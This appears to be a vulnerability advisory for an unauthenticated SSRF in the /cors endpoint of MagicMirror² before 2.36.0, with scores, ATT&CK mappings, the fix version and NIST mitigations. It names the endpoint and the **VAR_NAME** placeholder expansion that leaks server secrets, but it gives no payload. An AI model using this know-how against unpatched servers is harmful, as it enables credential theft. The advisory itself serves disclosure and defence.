CVE-2026-42281
Published: 14 May 2026
Summary
CVE-2026-42281 is a critical-severity SSRF (CWE-918) vulnerability in Magicmirror Magicmirror. Its CVSS base score is 9.2 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 26.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
MagicMirror² is an open source modular smart mirror platform affected by an unauthenticated Server-Side Request Forgery vulnerability tracked as CVE-2026-42281. The flaw resides in the /cors endpoint in all versions prior to 2.36.0 and is classified under CWE-918. It permits arbitrary HTTP requests while also expanding environment-variable placeholders in the form **VAR_NAME**, which can expose server-side secrets.
Any remote attacker can exploit the issue without authentication to reach internal networks, cloud metadata endpoints, and localhost services, achieving high-impact information disclosure as reflected in the CVSS 9.2 score. The same requests can be used to exfiltrate environment variables that may contain credentials or other sensitive configuration data.
The vulnerability is fixed in MagicMirror² version 2.36.0 according to the published GitHub Security Advisory. The EPSS score remains at 0.0326 with no material increase since disclosure.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-30313
Vulnerability details
MagicMirror² is an open source modular smart mirror platform. Prior to 2.36.0, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks,…
more
cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets. This vulnerability is fixed in 2.36.0.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Unauthenticated SSRF on public /cors endpoint directly enables T1190; explicit support for cloud metadata service requests enables T1552.005 credential exfiltration.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Enforces authorization checks on the /cors endpoint so unauthenticated remote attackers cannot initiate arbitrary SSRF requests.
Requires validation of the user-supplied URL (and **VAR_NAME** expansion) to block requests to internal, localhost, or metadata endpoints.
Enforces information-flow policy that denies server-initiated requests from reaching internal networks or cloud metadata services.